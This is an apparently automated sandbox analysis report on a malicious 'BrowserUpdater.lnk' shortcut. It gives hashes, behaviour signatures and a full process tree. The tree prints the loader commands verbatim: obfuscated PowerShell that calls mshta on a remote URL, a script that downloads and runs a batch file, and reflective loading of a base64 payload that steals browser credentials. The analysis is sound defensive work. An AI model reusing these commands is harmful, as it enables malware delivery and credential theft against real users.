Resubmissions
07/08/2024, 21:06
240807-zxvl6sxfkf 1006/08/2024, 20:12
240806-yzbfmssgqc 1006/08/2024, 19:51
240806-yk45eaydrn 10Analysis
-
max time kernel
627s -
max time network
740s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
06/08/2024, 20:12
Static task
static1
Behavioral task
behavioral1
Sample
BrowserUpdater.lnk
Resource
win7-20240729-en
General
-
Target
BrowserUpdater.lnk
-
Size
2KB
-
MD5
7ed0b7e22f568d2eedaf956ba831d0a6
-
SHA1
c073465e6ca109f2069f2e26f28525e66da54bee
-
SHA256
7a6ad3868f0223896ceea378a056b2568ad6f6ca2e65baaa7b55e1033da3abd7
-
SHA512
c718e67fb2554d7bbbac60a1a3dae6fe6bcdf4c06c0cababd8b623d52f1d306f9441c27deaaff269e129fb0dcecb17430480b1941b14d95a01d3ffd4c87887cd
Malware Config
Extracted
https://redr.me/g3boil/
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 11 IoCs
flow pid Process 2 264 mshta.exe 4 264 mshta.exe 7 264 mshta.exe 18 264 mshta.exe 20 264 mshta.exe 22 264 mshta.exe 24 264 mshta.exe 26 264 mshta.exe 31 264 mshta.exe 34 4856 powershell.exe 35 4856 powershell.exe -
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2308 attrib.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 428 Cloud.bat.Pzv -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
pid Process 4856 powershell.exe 2880 powershell.exe 4856 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 8 IoCs
flow ioc 78 bitbucket.org 80 bitbucket.org 81 bitbucket.org 39 bitbucket.org 40 bitbucket.org 68 bitbucket.org 73 bitbucket.org 74 bitbucket.org -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 97 ip-api.com -
Enumerates processes with tasklist 1 TTPs 6 IoCs
pid Process 4976 tasklist.exe 2364 tasklist.exe 2296 tasklist.exe 1400 tasklist.exe 1148 tasklist.exe 1792 tasklist.exe -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
description flow ioc HTTP User-Agent header 98 Go-http-client/1.1 -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2880 powershell.exe 2880 powershell.exe 4856 powershell.exe 4856 powershell.exe 428 Cloud.bat.Pzv 428 Cloud.bat.Pzv 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe 1908 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 4856 powershell.exe Token: SeDebugPrivilege 428 Cloud.bat.Pzv Token: SeDebugPrivilege 428 Cloud.bat.Pzv Token: SeDebugPrivilege 1908 aspnet_compiler.exe Token: SeDebugPrivilege 1148 tasklist.exe Token: SeDebugPrivilege 1792 tasklist.exe Token: SeIncreaseQuotaPrivilege 2320 wmic.exe Token: SeSecurityPrivilege 2320 wmic.exe Token: SeTakeOwnershipPrivilege 2320 wmic.exe Token: SeLoadDriverPrivilege 2320 wmic.exe Token: SeSystemProfilePrivilege 2320 wmic.exe Token: SeSystemtimePrivilege 2320 wmic.exe Token: SeProfSingleProcessPrivilege 2320 wmic.exe Token: SeIncBasePriorityPrivilege 2320 wmic.exe Token: SeCreatePagefilePrivilege 2320 wmic.exe Token: SeBackupPrivilege 2320 wmic.exe Token: SeRestorePrivilege 2320 wmic.exe Token: SeShutdownPrivilege 2320 wmic.exe Token: SeDebugPrivilege 2320 wmic.exe Token: SeSystemEnvironmentPrivilege 2320 wmic.exe Token: SeRemoteShutdownPrivilege 2320 wmic.exe Token: SeUndockPrivilege 2320 wmic.exe Token: SeManageVolumePrivilege 2320 wmic.exe Token: 33 2320 wmic.exe Token: 34 2320 wmic.exe Token: 35 2320 wmic.exe Token: 36 2320 wmic.exe Token: SeIncreaseQuotaPrivilege 2320 wmic.exe Token: SeSecurityPrivilege 2320 wmic.exe Token: SeTakeOwnershipPrivilege 2320 wmic.exe Token: SeLoadDriverPrivilege 2320 wmic.exe Token: SeSystemProfilePrivilege 2320 wmic.exe Token: SeSystemtimePrivilege 2320 wmic.exe Token: SeProfSingleProcessPrivilege 2320 wmic.exe Token: SeIncBasePriorityPrivilege 2320 wmic.exe Token: SeCreatePagefilePrivilege 2320 wmic.exe Token: SeBackupPrivilege 2320 wmic.exe Token: SeRestorePrivilege 2320 wmic.exe Token: SeShutdownPrivilege 2320 wmic.exe Token: SeDebugPrivilege 2320 wmic.exe Token: SeSystemEnvironmentPrivilege 2320 wmic.exe Token: SeRemoteShutdownPrivilege 2320 wmic.exe Token: SeUndockPrivilege 2320 wmic.exe Token: SeManageVolumePrivilege 2320 wmic.exe Token: 33 2320 wmic.exe Token: 34 2320 wmic.exe Token: 35 2320 wmic.exe Token: 36 2320 wmic.exe Token: SeDebugPrivilege 4976 tasklist.exe Token: SeDebugPrivilege 2364 tasklist.exe Token: SeDebugPrivilege 2296 tasklist.exe Token: SeIncreaseQuotaPrivilege 1444 wmic.exe Token: SeSecurityPrivilege 1444 wmic.exe Token: SeTakeOwnershipPrivilege 1444 wmic.exe Token: SeLoadDriverPrivilege 1444 wmic.exe Token: SeSystemProfilePrivilege 1444 wmic.exe Token: SeSystemtimePrivilege 1444 wmic.exe Token: SeProfSingleProcessPrivilege 1444 wmic.exe Token: SeIncBasePriorityPrivilege 1444 wmic.exe Token: SeCreatePagefilePrivilege 1444 wmic.exe Token: SeBackupPrivilege 1444 wmic.exe Token: SeRestorePrivilege 1444 wmic.exe Token: SeShutdownPrivilege 1444 wmic.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 2536 wrote to memory of 2880 2536 cmd.exe 86 PID 2536 wrote to memory of 2880 2536 cmd.exe 86 PID 2880 wrote to memory of 264 2880 powershell.exe 87 PID 2880 wrote to memory of 264 2880 powershell.exe 87 PID 264 wrote to memory of 4856 264 mshta.exe 91 PID 264 wrote to memory of 4856 264 mshta.exe 91 PID 4856 wrote to memory of 3684 4856 powershell.exe 94 PID 4856 wrote to memory of 3684 4856 powershell.exe 94 PID 3684 wrote to memory of 4068 3684 cmd.exe 96 PID 3684 wrote to memory of 4068 3684 cmd.exe 96 PID 3684 wrote to memory of 1676 3684 cmd.exe 97 PID 3684 wrote to memory of 1676 3684 cmd.exe 97 PID 3684 wrote to memory of 2308 3684 cmd.exe 98 PID 3684 wrote to memory of 2308 3684 cmd.exe 98 PID 3684 wrote to memory of 428 3684 cmd.exe 99 PID 3684 wrote to memory of 428 3684 cmd.exe 99 PID 428 wrote to memory of 1908 428 Cloud.bat.Pzv 104 PID 428 wrote to memory of 1908 428 Cloud.bat.Pzv 104 PID 428 wrote to memory of 1908 428 Cloud.bat.Pzv 104 PID 1908 wrote to memory of 1148 1908 aspnet_compiler.exe 106 PID 1908 wrote to memory of 1148 1908 aspnet_compiler.exe 106 PID 1908 wrote to memory of 1792 1908 aspnet_compiler.exe 107 PID 1908 wrote to memory of 1792 1908 aspnet_compiler.exe 107 PID 1908 wrote to memory of 2320 1908 aspnet_compiler.exe 108 PID 1908 wrote to memory of 2320 1908 aspnet_compiler.exe 108 PID 1908 wrote to memory of 4976 1908 aspnet_compiler.exe 109 PID 1908 wrote to memory of 4976 1908 aspnet_compiler.exe 109 PID 1908 wrote to memory of 2364 1908 aspnet_compiler.exe 110 PID 1908 wrote to memory of 2364 1908 aspnet_compiler.exe 110 PID 1908 wrote to memory of 2296 1908 aspnet_compiler.exe 111 PID 1908 wrote to memory of 2296 1908 aspnet_compiler.exe 111 PID 1908 wrote to memory of 1444 1908 aspnet_compiler.exe 112 PID 1908 wrote to memory of 1444 1908 aspnet_compiler.exe 112 PID 1908 wrote to memory of 1400 1908 aspnet_compiler.exe 113 PID 1908 wrote to memory of 1400 1908 aspnet_compiler.exe 113 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2308 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\BrowserUpdater.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted $C='.dmsi:aLSretpobg3hl/'; &(-join($C[(-612+615),(909-903),(148-141)])) :* (-join($C[(-612+615),(909-903),(148-141)])); :* %\ (-join($C[(410-408),(-612+615),(429-412),(-438+449),(909-903)])); foreach($p in @((371-354),(-821+832),(335-324),(-207+219),(-654+657),(740-735),(-129+148),(890-871),(222-213),(-354+364),(-800+801),(683-674),(550-550),(261-259),(462-452),(938-919),(-453+468),(-790+806),(-864+878),(749-736),(-625+629),(626-608),(-363+382))){$Y+=$C[$p]}; %\ $Y;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://redr.me/g3boil/3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function uqAehMaIe($NJTwTbrMX, $XJZkVi){[IO.File]::WriteAllBytes($NJTwTbrMX, $XJZkVi)};function apapZoXr($NJTwTbrMX){if($NJTwTbrMX.EndsWith((yNrVuHrL @(59913,59967,59975,59975))) -eq $True){Start-Process (yNrVuHrL @(59981,59984,59977,59967,59975,59975,59918,59917,59913,59968,59987,59968)) $NJTwTbrMX}else{Start-Process $NJTwTbrMX}};function gqcoIri($AHPcmYwv){$WfBZy = New-Object (yNrVuHrL @(59945,59968,59983,59913,59954,59968,59965,59934,59975,59972,59968,59977,59983));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$XJZkVi = $WfBZy.DownloadData($AHPcmYwv);return $XJZkVi};function yNrVuHrL($nIhcvb){$kXpIyeO=59867;$yoiSqUYc=$Null;foreach($SdAaMQf in $nIhcvb){$yoiSqUYc+=[char]($SdAaMQf-$kXpIyeO)};return $yoiSqUYc};function ZIxEQA(){$AQGzE = $env:APPDATA + '\';$tvNCPRFAm = gqcoIri (yNrVuHrL @(59971,59983,59983,59979,59982,59925,59914,59914,59970,59972,59983,59971,59984,59965,59913,59966,59978,59976,59914,59933,59981,59978,59986,59982,59968,59981,59934,59978,59976,59979,59964,59977,59988,59943,59943,59934,59914,59912,59916,59917,59914,59981,59968,59975,59968,59964,59982,59968,59982,59914,59967,59978,59986,59977,59975,59978,59964,59967,59914,59982,59968,59976,59983,59964,59970,59914,59934,59975,59978,59984,59967,59913,59965,59964,59983));$CRARBv = $AQGzE + 'Cloud.bat';uqAehMaIe $CRARBv $tvNCPRFAm;apapZoXr $CRARBv;;;;}ZIxEQA;4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4856 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Cloud.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3684 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "6⤵PID:4068
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\Cloud.bat.Pzv6⤵PID:1676
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Users\Admin\AppData\Roaming\Cloud.bat.Pzv6⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2308
-
-
C:\Users\Admin\AppData\Roaming\Cloud.bat.PzvC:\Users\Admin\AppData\Roaming\Cloud.bat.Pzv -WindowStyle hidden -command "$Ecqtlufnjt = get-content 'C:\Users\Admin\AppData\Roaming\Cloud.bat' | Select-Object -Last 1; $Vtnaspcvjk = [System.Convert]::FromBase64String($Ecqtlufnjt);$Poigdt = New-Object System.IO.MemoryStream( , $Vtnaspcvjk );$Narzsx = New-Object System.IO.MemoryStream;$Wfbek = New-Object System.IO.Compression.GzipStream $Poigdt, ([IO.Compression.CompressionMode]::Decompress);$Wfbek.CopyTo( $Narzsx );$Wfbek.Close();$Poigdt.Close();[byte[]] $Vtnaspcvjk = $Narzsx.ToArray();[Array]::Reverse($Vtnaspcvjk); $Dlehxafgx = [System.Threading.Thread]::GetDomain().Load($Vtnaspcvjk); $Wtslmaz = $Dlehxafgx.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Wtslmaz.DeclaringType, $Wtslmaz.Name).DynamicInvoke() | Out-Null"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe"7⤵
- Checks for VirtualBox DLLs, possible anti-VM trick
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq chrome.exe" /NH /FO CSV8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1148
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq chrome.exe" /NH /FO CSV8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\System32\Wbem\wmic.exewmic process where "" get CommandLine,ProcessId8⤵
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq chrome.exe" /NH /FO CSV8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq msedge.exe" /NH /FO CSV8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq msedge.exe" /NH /FO CSV8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2296
-
-
C:\Windows\System32\Wbem\wmic.exewmic process where "" get CommandLine,ProcessId8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\system32\tasklist.exetasklist /FI "IMAGENAME eq msedge.exe" /NH /FO CSV8⤵
- Enumerates processes with tasklist
PID:1400
-
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD502a1a26525c65a359d41483180eaa6f7
SHA1c0e2578b92d20e925c1c87016d1a9fccee1ec56f
SHA256d0ec351493bdbc6cb94990b162bb8be5b0217277cc55ae12aa3c7ea704cdbc6e
SHA512d3271137241553f8316fcfc94dcf88c2887ee7bb0babddb4c1666fb5ae821a28425400299281422a4ebeb1f4c7369443b839d10f182279504bbba5f2f1cd94c2
-
Filesize
1KB
MD5d4ff23c124ae23955d34ae2a7306099a
SHA1b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA2561de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
642KB
MD51369fd10f66d0ab867aab559253b01e4
SHA17509024aa23625a16166eb0c59f74562a45a4a97
SHA256a444e147dd38ee76b4968f772ed67e0ed805de116137621e10acfa93781fe2c8
SHA5120661f74c1b7c91433dcf0522b1d944dd7b68e7f7eba1df26c76f87756268696e8d46f5d2b88d452cfbd9034a9768f990e189739422053d650641b55cb5621f3e
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b